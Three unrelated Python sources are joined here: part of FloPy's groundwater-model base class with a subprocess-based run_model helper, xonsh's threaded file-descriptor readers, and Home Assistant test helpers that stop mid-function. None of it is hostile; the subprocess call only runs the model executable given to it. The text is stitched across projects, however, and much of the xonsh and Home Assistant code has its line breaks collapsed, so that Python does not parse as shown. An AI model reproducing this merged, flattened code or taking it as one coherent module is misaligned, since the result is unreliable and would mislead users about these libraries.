            then be used with get_package to pull out individual packages.

        """
        val = []
        for pp in (self.packagelist):
            if ftype is None:
                val.append(pp.name[0].upper())
            elif pp.package_type.lower() == ftype:
                val.append(pp.name[0].upper())
        return val

    def set_version(self, version):
        self.version = version.lower()

        # check that this is a valid model version
        if self.version not in list(self.version_types.keys()):
            err = 'Error: Unsupported model version ({}).'.format(
                self.version) + ' Valid model versions are:'
            for v in list(self.version_types.keys()):
                err += ' {}'.format(v)
            raise Exception(err)

        # set namefile heading
        heading = '# Name file for ' + \
                  '{}, '.format(self.version_types[self.version]) + \
                  'generated by Flopy version {}.'.format(__version__)
        self.heading = heading

        # set heading for each package
        for p in self.get_package_list():
            pak = self.get_package(p)
            heading = '# {} package for '.format(pak.name[0]) + \
                      '{}, '.format(self.version_types[self.version]) + \
                      'generated by Flopy version {}.'.format(__version__)
            pak.heading = heading
        return None

    def change_model_ws(self, new_pth=None, reset_external=False):
        """
        Change the model work space.

        Parameters
        ----------
        new_pth : str
            Location of new model workspace.  If this path does not exist,
            it will be created. (default is None, which will be assigned
            to the present working directory).

        Returns
        -------
        None

        """
        if new_pth is None:
            new_pth = os.getcwd()
        if not os.path.exists(new_pth):
            try:
                line = '\ncreating model workspace...\n' + \
                       '   {}'.format(new_pth)
                print(line)
                os.makedirs(new_pth)
            except:
                line = '\n{} not valid, workspace-folder '.format(new_pth)
                raise OSError(line)
                # line = '\n{} not valid, workspace-folder '.format(new_pth) + \
                #        'was changed to {}\n'.format(os.getcwd())
                # print(line)
                # new_pth = os.getcwd()

        # --reset the model workspace
        old_pth = self._model_ws
        self._model_ws = new_pth
        line = '\nchanging model workspace...\n   {}\n'.format(new_pth)
        sys.stdout.write(line)

        # reset the paths for each package
        for pp in (self.packagelist):
            pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])

        # create the external path (if needed)
        if hasattr(self, "external_path") and self.external_path is not None \
                and not os.path.exists(os.path.join(self._model_ws,
                                                    self.external_path)):
            pth = os.path.join(self._model_ws, self.external_path)
            os.makedirs(pth)
            if reset_external:
                self._reset_external(pth, old_pth)
        elif reset_external:
            self._reset_external(self._model_ws, old_pth)
        return None

    def _reset_external(self, pth, old_pth):
        new_ext_fnames = []
        for ext_file, output in zip(self.external_fnames,
                                    self.external_output):
            # new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
            # this is a wicked mess
            if output:
                # new_ext_file = os.path.join(pth,
                #                             os.path.split(ext_file)[-1])
                new_ext_file = ext_file
            else:
                # fpth = os.path.abspath(os.path.join(old_pth, ext_file))
                # new_ext_file = os.path.relpath(fpth, os.path.abspath(pth))
                fdir = os.path.dirname(ext_file)
                if fdir == '':
                    fpth = os.path.abspath(os.path.join(old_pth, ext_file))
                else:
                    fpth = ext_file
                ao = os.path.abspath(os.path.dirname(fpth))
                ep = os.path.abspath(pth)
                relp = os.path.relpath(ao, ep)
                new_ext_file = os.path.join(relp, os.path.basename(ext_file))
            new_ext_fnames.append(new_ext_file)
        self.external_fnames = new_ext_fnames

    @property
    def model_ws(self):
        return copy.deepcopy(self._model_ws)

    def _set_name(self, value):
        """
        Set model name

        Parameters
        ----------
        value : str
            Name to assign to model.

        """
        self.__name = str(value)
        self.namefile = self.__name + '.' + self.namefile_ext
        for p in self.packagelist:
            for i in range(len(p.extension)):
                p.file_name[i] = self.__name + '.' + p.extension[i]
            p.fn_path = os.path.join(self.model_ws, p.file_name[0])

    def __setattr__(self, key, value):
        if key == "free_format_input":
            # if self.bas6 is not None:
            #     self.bas6.ifrefm = value
            super(BaseModel, self).__setattr__(key, value)
        elif key == "name":
            self._set_name(value)
        elif key == "model_ws":
            self.change_model_ws(value)
        elif key == "sr":
            assert isinstance(value, utils.reference.SpatialReference)
            warnings.warn("SpatialReference has been deprecated.",
                          category=DeprecationWarning)
            if self.dis is not None:
                self.dis.sr = value
            else:
                raise Exception("cannot set SpatialReference - "
                                "ModflowDis not found")
        elif key == "tr":
            assert isinstance(value,
                              discretization.reference.TemporalReference)
            if self.dis is not None:
                self.dis.tr = value
            else:
                raise Exception("cannot set TemporalReference - "
                                "ModflowDis not found")
        elif key == "start_datetime":
            if self.dis is not None:
                self.dis.start_datetime = value
                self.tr.start_datetime = value
            else:
                raise Exception("cannot set start_datetime - "
                                "ModflowDis not found")
        else:
            super(BaseModel, self).__setattr__(key, value)

    def run_model(self, silent=False, pause=False, report=False,
                  normal_msg='normal termination'):
        """
        This method will run the model using subprocess.Popen.

        Parameters
        ----------
        silent : boolean
            If True, suppress echoing run information to the screen.
            (default is False).
        pause : boolean, optional
            Pause upon completion (default is False).
        report : boolean, optional
            Save stdout lines to a list (buff) which is returned by the
            method. (default is False).
        normal_msg : str
            Normal termination message used to determine if the run
            terminated normally. (default is 'normal termination')

        Returns
        -------
        (success, buff)
        success : boolean
        buff : list of lines of stdout

        """
        return run_model(self.exe_name, self.namefile,
                         model_ws=self.model_ws, silent=silent, pause=pause,
                         report=report, normal_msg=normal_msg)

    def load_results(self):
        print('load_results not implemented')
        return None
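    # Usage note: run_model() above is a thin wrapper around the module-level
    # run_model() defined at the bottom of this file; it only supplies
    # exe_name, namefile and model_ws from the instance.  Typical call
    # pattern (hypothetical model `ml` whose input files already exist):
    #
    # >>> ml.write_input()
    # >>> success, buff = ml.run_model(silent=True)
    # >>> success
    # True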
    def write_input(self, SelPackList=False, check=False):
        """
        Write the input.

        Parameters
        ----------
        SelPackList : False or list of packages

        """
        if check:
            # run check prior to writing input
            self.check(f='{}.chk'.format(self.name),
                       verbose=self.verbose, level=1)

        # reset the model to free_format if parameter substitution was
        # performed on a model load
        if self.parameter_load and not self.free_format_input:
            if self.verbose:
                print('\nResetting free_format_input to True to '
                      'preserve the precision of the parameter data.')
            self.free_format_input = True

        if self.verbose:
            print('\nWriting packages:')

        if SelPackList == False:
            for p in self.packagelist:
                if self.verbose:
                    print('   Package: ', p.name[0])
                # prevent individual package checks from running after
                # model-level package check above
                # otherwise checks are run twice
                # or the model level check procedure would have to be split up
                # or each package would need a check argument,
                # or default for package level check would have to be False
                try:
                    p.write_file(check=False)
                except TypeError:
                    p.write_file()
        else:
            for pon in SelPackList:
                for i, p in enumerate(self.packagelist):
                    if pon in p.name:
                        if self.verbose:
                            print('   Package: ', p.name[0])
                        try:
                            p.write_file(check=False)
                        except TypeError:
                            p.write_file()
                        break
        if self.verbose:
            print(' ')
        # write name file
        self.write_name_file()
        # os.chdir(org_dir)
        return

    def write_name_file(self):
        """
        Every Package needs its own writenamefile function

        """
        raise Exception(
            'IMPLEMENTATION ERROR: writenamefile must be overloaded')

    def set_model_units(self):
        """
        Every model needs its own set_model_units method

        """
        raise Exception(
            'IMPLEMENTATION ERROR: set_model_units must be overloaded')

    @property
    def name(self):
        """
        Get model name

        Returns
        -------
        name : str
            name of model

        """
        return copy.deepcopy(self.__name)

    def add_pop_key_list(self, key):
        """
        Add a external file unit number to a list that will be used to
        remove model output (typically binary) files from ext_unit_dict.

        Parameters
        ----------
        key : int
            file unit number

        """
        if key not in self.pop_key_list:
            self.pop_key_list.append(key)

    def check(self, f=None, verbose=True, level=1):
        """
        Check model data for common errors.

        Parameters
        ----------
        f : str or file handle
            String defining file name or file handle for summary file
            of check method output. If a string is passed a file handle
            is created. If f is None, check method does not write
            results to a summary file. (default is None)
        verbose : bool
            Boolean flag used to determine if check method results are
            written to the screen
        level : int
            Check method analysis level. If level=0, summary checks are
            performed. If level=1, full checks are performed.

        Returns
        -------
        None

        Examples
        --------

        >>> import flopy
        >>> m = flopy.modflow.Modflow.load('model.nam')
        >>> m.check()
        """
        # check instance for model-level check
        chk = utils.check(self, f=f, verbose=verbose, level=level)
        results = {}

        for p in self.packagelist:
            if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
                results[p.name[0]] = p.check(f=None, verbose=False,
                                             level=level - 1)

        # model level checks
        # solver check
        if self.version in chk.solver_packages.keys():
            solvers = set(chk.solver_packages[self.version]).intersection(
                set(self.get_package_list()))
            if not solvers:
                chk._add_to_summary('Error', desc='\r No solver package',
                                    package='model')
            elif len(list(solvers)) > 1:
                for s in solvers:
                    chk._add_to_summary('Error',
                                        desc='\r Multiple solver packages',
                                        package=s)
            else:
                chk.passed.append('Compatible solver package')

        # check for unit number conflicts
        package_units = {}
        duplicate_units = {}
        for p in self.packagelist:
            for i in range(len(p.name)):
                if p.unit_number[i] != 0:
                    if p.unit_number[i] in package_units.values():
                        duplicate_units[p.name[i]] = p.unit_number[i]
                        otherpackage = [k for k, v in package_units.items()
                                        if v == p.unit_number[i]][0]
                        duplicate_units[otherpackage] = p.unit_number[i]
                    # record the unit so later packages can be checked
                    # against it
                    package_units[p.name[i]] = p.unit_number[i]
        if len(duplicate_units) > 0:
            for k, v in duplicate_units.items():
                chk._add_to_summary('Error', package=k, value=v,
                                    desc='unit number conflict')
        else:
            chk.passed.append('Unit number conflicts')

        # add package check results to model level check summary
        for k, r in results.items():
            if r is not None and r.summary_array is not None:
                # currently SFR doesn't have one
                chk.summary_array = np.append(chk.summary_array,
                                              r.summary_array).view(
                    np.recarray)
                chk.passed += ['{} package: {}'.format(r.package.name[0], psd)
                               for psd in r.passed]
        chk.summarize()
        return chk

    def plot(self, SelPackList=None, **kwargs):
        """
        Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
        model input data

        Parameters
        ----------
        SelPackList : bool or list
            List of packages to plot. If SelPackList=None all packages
            are plotted. (default is None)
        **kwargs : dict
            filename_base : str
                Base file name that will be used to automatically generate
                file names for output image files. Plots will be exported
                as image files if file_name_base is not None. (default is
                None)
            file_extension : str
                Valid matplotlib.pyplot file extension for savefig(). Only
                used if filename_base is not None. (default is 'png')
            mflay : int
                MODFLOW zero-based layer number to return. If None, then
                all layers will be included. (default is None)
            kper : int
                MODFLOW zero-based stress period number to return.
                (default is zero)
            key : str
                MfList dictionary key. (default is None)

        Returns
        -------
        axes : list
            Empty list is returned if filename_base is not None. Otherwise
            a list of matplotlib.pyplot.axis are returned.

        Examples
        --------
        >>> import flopy
        >>> ml = flopy.modflow.Modflow.load('test.nam')
        >>> ml.plot()

        """
        from flopy.plot import PlotUtilities

        axes = PlotUtilities._plot_model_helper(self,
                                                SelPackList=SelPackList,
                                                **kwargs)
        return axes

    def to_shapefile(self, filename, package_names=None, **kwargs):
        """
        Wrapper function for writing a shapefile for the model grid.  If
        package_names is not None, then search through the requested
        packages looking for arrays that can be added to the shapefile as
        attributes

        Parameters
        ----------
        filename : string
            name of the shapefile to write
        package_names : list of package names (e.g. ["dis","lpf"])
            Packages to export data arrays to shapefile. (default is None)

        Returns
        -------
        None

        Examples
        --------
        >>> import flopy
        >>> m = flopy.modflow.Modflow()
        >>> m.to_shapefile('model.shp', SelPackList)

        """
        warnings.warn("to_shapefile() is deprecated. use .export()")
        self.export(filename, package_names=package_names)
        return


def run_model(exe_name, namefile, model_ws='./',
              silent=False, pause=False, report=False,
              normal_msg='normal termination', use_async=False, cargs=None):
    """
    This function will run the model using subprocess.Popen.  It
    communicates with the model's stdout asynchronously and reports
    progress to the screen with timestamps

    Parameters
    ----------
    exe_name : str
        Executable name (with path, if necessary) to run.
    namefile : str
        Namefile of model to run. The namefile must be the filename of the
        namefile without the path. Namefile can be None to allow programs
        that do not require a control file (name file) to be passed as a
        command line argument.
    model_ws : str
        Path to the location of the namefile. (default is the current
        working directory - './')
    silent : boolean
        If True, suppress echoing run information to the screen.
        (default is False).
    pause : boolean, optional
        Pause upon completion (default is False).
    report : boolean, optional
        Save stdout lines to a list (buff) which is returned by the
        method. (default is False).
    normal_msg : str
        Normal termination message used to determine if the run terminated
        normally. (default is 'normal termination')
    use_async : boolean
        asynchronously read model stdout and report with timestamps.  good
        for models that take long time to run.  not good for models that
        run really fast
    cargs : str or list of strings
        additional command line arguments to pass to the executable.
        Default is None

    Returns
    -------
    (success, buff)
    success : boolean
    buff : list of lines of stdout

    """
    success = False
    buff = []

    # convert normal_msg to a list of lower case str for comparison
    if isinstance(normal_msg, str):
        normal_msg = [normal_msg.lower()]
    elif isinstance(normal_msg, list):
        for idx, s in enumerate(normal_msg):
            normal_msg[idx] = s.lower()

    # Check to make sure that program and namefile exist
    exe = which(exe_name)
    if exe is None:
        import platform
        if platform.system() in 'Windows':
            if not exe_name.lower().endswith('.exe'):
                exe = which(exe_name + '.exe')
    if exe is None:
        s = 'The program {} does not exist or is not executable.'.format(
            exe_name)
        raise Exception(s)
    else:
        if not silent:
            s = 'FloPy is using the following executable to run the ' \
                'model: {}'.format(exe)
            print(s)

    if namefile is not None:
        if not os.path.isfile(os.path.join(model_ws, namefile)):
            s = 'The namefile for this model ' + \
                'does not exist: {}'.format(namefile)
            raise Exception(s)

    # simple little function for the thread to target
    def q_output(output, q):
        for line in iter(output.readline, b''):
            q.put(line)
            # time.sleep(1)
            # output.close()

    # create a list of arguments to pass to Popen
    argv = [exe_name]
    if namefile is not None:
        argv.append(namefile)

    # add additional arguments to Popen arguments
    if cargs is not None:
        if isinstance(cargs, str):
            cargs = [cargs]
        for t in cargs:
            argv.append(t)

    # run the model with Popen
    proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)

    if not use_async:
        while True:
            line = proc.stdout.readline()
            c = line.decode('utf-8')
            if c != '':
                for msg in normal_msg:
                    if msg in c.lower():
                        success = True
                        break
                c = c.rstrip('\r\n')
                if not silent:
                    print('{}'.format(c))
                if report == True:
                    buff.append(c)
            else:
                break
        return success, buff

    # some tricks for the async stdout reading
    q = Queue.Queue()
    thread = threading.Thread(target=q_output, args=(proc.stdout, q))
    thread.daemon = True
    thread.start()

    failed_words = ["fail", "error"]
    last = datetime.now()
    lastsec = 0.
    while True:
        try:
            line = q.get_nowait()
        except Queue.Empty:
            pass
        else:
            if line == '':
                break
            line = line.decode().lower().strip()
            if line != '':
                now = datetime.now()
                dt = now - last
                tsecs = dt.total_seconds() - lastsec
                line = "(elapsed:{0})-->{1}".format(tsecs, line)
                lastsec = tsecs + lastsec
                buff.append(line)
                if not silent:
                    print(line)
                for fword in failed_words:
                    if fword in line:
                        success = False
                        break
        if proc.poll() is not None:
            break
    proc.wait()
    thread.join(timeout=1)
    # drain any remaining output; decode so the checks below compare str
    # against str, not bytes
    buff.extend([b.decode().lower() for b in proc.stdout.readlines()])
    proc.stdout.close()

    # normal_msg was normalized to a list above, so test each message
    for line in buff:
        if any(msg in line for msg in normal_msg):
            print("success")
            success = True
            break

    if pause:
        input('Press Enter to continue...')
    return success, buff
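# Usage sketch for the module-level runner (hypothetical paths; assumes a
# MODFLOW executable named 'mf2005' on the PATH and a complete set of input
# files in ./demo):
#
# >>> success, buff = run_model('mf2005', 'demo.nam', model_ws='./demo',
# ...                           silent=True, report=True)
# >>> success
# True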
readers.py
"""File handle readers and related tools.""" import ctypes import io import os import queue import sys import threading import time import xonsh.lazyimps as xli from xonsh.built_ins import XSH class QueueReader: """Provides a file-like interface to reading from a queue.""" def __init__(self, fd, timeout=None): """ Parameters ---------- fd : int A file descriptor timeout : float or None, optional The queue reading timeout. """ self.fd = fd self.timeout = timeout self.closed = False self.queue = queue.Queue() self.thread = None def close(self): """close the reader""" self.closed = True def is_fully_read(self): """Returns whether or not the queue is fully read and the reader is closed. """ return ( self.closed and (self.thread is None or not self.thread.is_alive()) and self.queue.empty() ) def read_queue(self): """Reads a single chunk from the queue. This is blocking if the timeout is None and non-blocking otherwise. """ try: return self.queue.get(block=True, timeout=self.timeout) except queue.Empty: return b"" def read(self, size=-1): """Reads bytes from the file.""" buf = bytearray() while size < 0 or len(buf) != size: line = self.read_queue() if line: buf += line else: break return buf def readline(self, size=-1): """Reads a line, or a partial line from the file descriptor.""" nl = b"\n" buf = bytearray() while size < 0 or len(buf) != size: line = self.read_queue() if line: buf += line if line.endswith(nl): break else: break return buf def _read_all_lines(self): """This reads all remaining lines in a blocking fashion.""" lines = [] while not self.is_fully_read(): chunk = self.read_queue() lines.extend(chunk.splitlines(keepends=True)) return lines def readlines(self, hint=-1): """Reads lines from the file descriptor. This is blocking for negative hints (i.e. read all the remaining lines) and non-blocking otherwise. """ if hint == -1: return self._read_all_lines() lines = [] while len(lines) != hint: chunk = self.read_queue() if not chunk: break lines.extend(chunk.splitlines(keepends=True)) return lines def fileno(self): """Returns the file descriptor number.""" return self.fd @staticmethod def readable(): """Returns true, because this object is always readable.""" return True def iterqueue(self): """Iterates through all remaining chunks in a blocking fashion.""" while not self.is_fully_read(): chunk = self.read_queue() if not chunk: continue yield chunk def populate_fd_queue(reader, fd, queue): """Reads 1 kb of data from a file descriptor into a queue. If this ends or fails, it flags the calling reader object as closed. """ while True: try: c = os.read(fd, 1024) except OSError: reader.closed = True break if c: queue.put(c) else: reader.closed = True break class NonBlockingFDReader(QueueReader): """A class for reading characters from a file descriptor on a background thread. This has the advantages that the calling thread can close the file and that the reading does not block the calling thread. """ def __init__(self, fd, timeout=None): """ Parameters ---------- fd : int A file descriptor timeout : float or None, optional The queue reading timeout. """ super().__init__(fd, timeout=timeout) # start reading from stream self.thread = threading.Thread( target=populate_fd_queue, args=(self, self.fd, self.queue) ) self.thread.daemon = True self.thread.start() def populate_buffer(reader, fd, buffer, chunksize): """Reads bytes from the file descriptor and copies them into a buffer. The reads happen in parallel using the pread() syscall; which is only available on POSIX systems. 
def populate_buffer(reader, fd, buffer, chunksize):
    """Reads bytes from the file descriptor and copies them into a buffer.
    The reads happen in parallel using the pread() syscall, which is only
    available on POSIX systems. If the read fails for any reason, the
    reader is flagged as closed.
    """
    offset = 0
    while True:
        try:
            buf = os.pread(fd, chunksize, offset)
        except OSError:
            reader.closed = True
            break
        if buf:
            buffer.write(buf)
            offset += len(buf)
        else:
            reader.closed = True
            break


class BufferedFDParallelReader:
    """Buffered, parallel background thread reader."""

    def __init__(self, fd, buffer=None, chunksize=1024):
        """
        Parameters
        ----------
        fd : int
            File descriptor from which to read.
        buffer : binary file-like or None, optional
            A buffer to write bytes into. If None, a new BytesIO object
            is created.
        chunksize : int, optional
            The max size of the parallel reads, default 1 kb.
        """
        self.fd = fd
        self.buffer = io.BytesIO() if buffer is None else buffer
        self.chunksize = chunksize
        self.closed = False
        # start reading from stream
        self.thread = threading.Thread(
            target=populate_buffer, args=(self, fd, self.buffer, chunksize)
        )
        self.thread.daemon = True
        self.thread.start()


def _expand_console_buffer(cols, max_offset, expandsize, orig_posize, fd):
    # if we are getting close to the end of the console buffer,
    # expand it so that we can read from it successfully.
    if cols == 0:
        return orig_posize[-1], max_offset, orig_posize
    rows = ((max_offset + expandsize) // cols) + 1
    xli.winutils.set_console_screen_buffer_size(cols, rows, fd=fd)
    orig_posize = orig_posize[:3] + (rows,)
    max_offset = (rows - 1) * cols
    return rows, max_offset, orig_posize


def populate_console(reader, fd, buffer, chunksize, queue, expandsize=None):
    """Reads bytes from the file descriptor and puts lines into the queue.
    The reads happen in parallel, using
    xonsh.winutils.read_console_output_character(), and are thus only
    available on Windows. If the read fails for any reason, the reader is
    flagged as closed.
    """
    # OK, so this function is super annoying because Windows stores its
    # buffers as a 2D regular, dense array -- without trailing newlines.
    # Meanwhile, we want to add *lines* to the queue. Also, as is typical
    # with parallel reads, the entire buffer that you ask for may not be
    # filled. Thus we have to deal with the full generality.
    #   1. reads may end in the middle of a line
    #   2. excess whitespace at the end of a line may not be real, unless
    #   3. you haven't read to the end of the line yet!
    # So there are alignment issues everywhere.  Also, Windows will
    # automatically read past the current cursor position, even though
    # there is presumably nothing to see there.
    #
    # These chunked reads basically need to happen like this because,
    #   a. The default buffer size is HUGE for the console (90k lines x
    #      120 cols) and so we can't just read in everything at the end and
    #      see what we care about without a noticeable performance hit.
    #   b. Even with this huge size, it is still possible to write more
    #      lines than this, so we should scroll along with the console.
    # Unfortunately, because we do not have control over the terminal
    # emulator, it is not possible to compute how far back we should set
    # the beginning read position because we don't know how many characters
    # have been popped off the top of the buffer. If we did somehow know
    # this number we could do something like the following:
    #
    #   new_offset = (y * cols) + x
    #   if new_offset == max_offset:
    #       new_offset -= scrolled_offset
    #       x = new_offset % cols
    #       y = new_offset // cols
    #       continue
    #
    # So this method is imperfect and only works as long as the screen has
    # room to expand to. Thus the trick here is to expand the screen size
    # when we get close enough to the end of the screen. There remain some
    # async issues related to not being able to set the cursor position,
    # but they just affect the alignment / capture of the output of the
    # first command run after a screen resize.
    if expandsize is None:
        expandsize = 100 * chunksize
    x, y, cols, rows = posize = xli.winutils.get_position_size(fd)
    pre_x = pre_y = -1
    orig_posize = posize
    offset = (cols * y) + x
    max_offset = (rows - 1) * cols
    # I believe that there is a bug in PTK that if we reset the
    # cursor position, the cursor on the next prompt is accidentally on
    # the next line.  If this is fixed, uncomment the following line.
    # if max_offset < offset + expandsize:
    #     rows, max_offset, orig_posize = _expand_console_buffer(
    #         cols, max_offset, expandsize, orig_posize, fd)
    #     winutils.set_console_cursor_position(x, y, fd=fd)
    while True:
        posize = xli.winutils.get_position_size(fd)
        offset = (cols * y) + x
        if ((posize[1], posize[0]) <= (y, x) and posize[2:] == (cols, rows)) or (
            pre_x == x and pre_y == y
        ):
            # already at or ahead of the current cursor position.
            if reader.closed:
                break
            else:
                time.sleep(reader.timeout)
                continue
        elif max_offset <= offset + expandsize:
            ecb = _expand_console_buffer(cols, max_offset, expandsize,
                                         orig_posize, fd)
            rows, max_offset, orig_posize = ecb
            continue
        elif posize[2:] == (cols, rows):
            # cursor updated but screen size is the same.
            pass
        else:
            # screen size changed, which is offset preserving
            orig_posize = posize
            cols, rows = posize[2:]
            x = offset % cols
            y = offset // cols
            pre_x = pre_y = -1
            max_offset = (rows - 1) * cols
            continue
        try:
            buf = xli.winutils.read_console_output_character(
                x=x, y=y, fd=fd, buf=buffer, bufsize=chunksize, raw=True
            )
        except OSError:
            reader.closed = True
            break
        # cursor position and offset
        if not reader.closed:
            buf = buf.rstrip()
            nread = len(buf)
            if nread == 0:
                time.sleep(reader.timeout)
                continue
            cur_x, cur_y = posize[0], posize[1]
            cur_offset = (cols * cur_y) + cur_x
            beg_offset = (cols * y) + x
            end_offset = beg_offset + nread
            if end_offset > cur_offset and cur_offset != max_offset:
                buf = buf[: cur_offset - end_offset]
        # convert to lines
        xshift = cols - x
        yshift = (nread // cols) + (1 if nread % cols > 0 else 0)
        lines = [buf[:xshift]]
        lines += [
            buf[l * cols + xshift : (l + 1) * cols + xshift]
            for l in range(yshift)  # noqa
        ]
        lines = [line for line in lines if line]
        if not lines:
            time.sleep(reader.timeout)
            continue
        # put lines in the queue
        nl = b"\n"
        for line in lines[:-1]:
            queue.put(line.rstrip() + nl)
        if len(lines[-1]) == xshift:
            queue.put(lines[-1].rstrip() + nl)
        else:
            queue.put(lines[-1])
        # update x and y locations
        if (beg_offset + len(buf)) % cols == 0:
            new_offset = beg_offset + len(buf)
        else:
            new_offset = beg_offset + len(buf.rstrip())
        pre_x = x
        pre_y = y
        x = new_offset % cols
        y = new_offset // cols
        time.sleep(reader.timeout)


class ConsoleParallelReader(QueueReader):
    """Parallel reader for consoles that runs in a background thread.
    This is only needed, available, and useful on Windows.
    """

    def __init__(self, fd, buffer=None, chunksize=1024, timeout=None):
        """
        Parameters
        ----------
        fd : int
            Standard buffer file descriptor, 0 for stdin, 1 for stdout
            (default), and 2 for stderr.
        buffer : ctypes.c_wchar_p, optional
            An existing buffer to (re-)use.
        chunksize : int, optional
            The max size of the parallel reads, default 1 kb.
        timeout : float, optional
            The queue reading timeout.
        """
        timeout = timeout or XSH.env.get("XONSH_PROC_FREQUENCY")
        super().__init__(fd, timeout=timeout)
        self._buffer = buffer  # this cannot be public
        if buffer is None:
            self._buffer = ctypes.c_char_p(b" " * chunksize)
        self.chunksize = chunksize
        # start reading from stream
        self.thread = threading.Thread(
            target=populate_console,
            args=(self, fd, self._buffer, chunksize, self.queue),
        )
        self.thread.daemon = True
        self.thread.start()


def safe_fdclose(handle, cache=None):
    """Closes a file handle in the safest way possible, and potentially
    storing the result.
    """
    if cache is not None and cache.get(handle, False):
        return
    status = True
    if handle is None:
        pass
    elif isinstance(handle, int):
        if handle >= 3:
            # don't close stdin, stdout, stderr, -1
            try:
                os.close(handle)
            except OSError:
                status = False
    elif handle is sys.stdin or handle is sys.stdout or handle is sys.stderr:
        # don't close stdin, stdout, or stderr
        pass
    else:
        try:
            handle.close()
        except OSError:
            status = False
    if cache is not None:
        cache[handle] = status
common.py
"""Test the helper method for writing tests.""" import asyncio import collections from collections import OrderedDict from contextlib import contextmanager from datetime import timedelta import functools as ft from io import StringIO import json import logging import os import sys import threading import time import uuid from aiohttp.test_utils import unused_port as get_test_instance_port # noqa from homeassistant import auth, config_entries, core as ha, loader from homeassistant.auth import ( auth_store, models as auth_models, permissions as auth_permissions, providers as auth_providers, ) from homeassistant.auth.permissions import system_policies from homeassistant.components import recorder from homeassistant.components.device_automation import ( # noqa: F401 _async_get_device_automation_capabilities as async_get_device_automation_capabilities, _async_get_device_automations as async_get_device_automations, ) from homeassistant.components.mqtt.models import Message from homeassistant.config import async_process_component_config from homeassistant.const import ( ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME, EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED, EVENT_TIME_CHANGED, STATE_OFF, STATE_ON, ) from homeassistant.core import State from homeassistant.helpers import ( area_registry, device_registry, entity, entity_platform, entity_registry, intent, restore_state, storage, ) from homeassistant.helpers.json import JSONEncoder from homeassistant.setup import setup_component from homeassistant.util.async_ import run_callback_threadsafe import homeassistant.util.dt as date_util from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.yaml.loader as yaml_loader from tests.async_mock import AsyncMock, Mock, patch _LOGGER = logging.getLogger(__name__) INSTANCES = [] CLIENT_ID = "https://example.com/app" CLIENT_REDIRECT_URI = "https://example.com/app/callback" def threadsafe_callback_factory(func): """Create threadsafe functions out of callbacks. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return run_callback_threadsafe( hass.loop, ft.partial(func, *args, **kwargs) ).result() return threadsafe def threadsafe_coroutine_factory(func): """Create threadsafe functions out of coroutine. Callback needs to have `hass` as first argument. 
""" @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return asyncio.run_coroutine_threadsafe( func(*args, **kwargs), hass.loop ).result() return threadsafe def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config directory.""" if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) hass = loop.run_until_complete(async_test_home_assistant(loop)) stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() stop_event.set() orig_stop = hass.stop def start_hass(*mocks): """Start hass.""" asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result() def stop_hass(): """Stop hass.""" orig_stop() stop_event.wait() loop.close() hass.start = start_hass hass.stop = stop_hass threading.Thread(name="LoopThread", target=run_loop, daemon=False).start() return hass # pylint: disable=protected-access async def async_test_home_assistant(loop): """Return a Home Assistant object pointing at test config dir.""" hass = ha.HomeAssistant() store = auth_store.AuthStore(hass) hass.auth = auth.AuthManager(hass, store, {}, {}) ensure_auth_manager_loaded(hass.auth) INSTANCES.append(hass) orig_async_add_job = hass.async_add_job orig_async_add_executor_job = hass.async_add_executor_job orig_async_create_task = hass.async_create_task def async_add_job(target, *args): """Add job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock) and not isinstance(target, AsyncMock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_job(target, *args) def async_add_executor_job(target, *args): """Add executor job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_executor_job(target, *args) def async_create_task(coroutine): """Create task.""" if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock): fut = asyncio.Future() fut.set_result(None) return fut return orig_async_create_task(coroutine) hass.async_add_job = async_add_job hass.async_add_executor_job = async_add_executor_job hass.async_create_task = async_create_task hass.config.location_name = "test home" hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.time_zone = date_util.get_time_zone("US/Pacific") hass.config.units = METRIC_SYSTEM hass.config.skip_pip = True hass.config_entries = config_entries.ConfigEntries(hass, {}) hass.config_entries._entries = [] hass.config_entries._store._async_ensure_stop_listener = lambda: None hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start async def mock_async_start(): """Start the mocking.""" # We only mock time during tests and we want to track tasks with patch("homeassistant.core._async_create_timer"), patch.object( hass, "async_stop_track_tasks" ): await orig_start() hass.async_start = mock_async_start @ha.callback def clear_instance(event): """Clear global instance.""" INSTANCES.remove(hass) 
def async_mock_service(hass, domain, service, schema=None):
    """Set up a fake service & return a calls log list to this service."""
    calls = []

    @ha.callback
    def mock_service_log(call):  # pylint: disable=unnecessary-lambda
        """Mock service call."""
        calls.append(call)

    hass.services.async_register(domain, service, mock_service_log,
                                 schema=schema)

    return calls


mock_service = threadsafe_callback_factory(async_mock_service)


@ha.callback
def async_mock_intent(hass, intent_typ):
    """Set up a fake intent handler."""
    intents = []

    class MockIntentHandler(intent.IntentHandler):
        intent_type = intent_typ

        async def async_handle(self, intent):
            """Handle the intent."""
            intents.append(intent)
            return intent.create_response()

    intent.async_register(hass, MockIntentHandler())

    return intents


@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
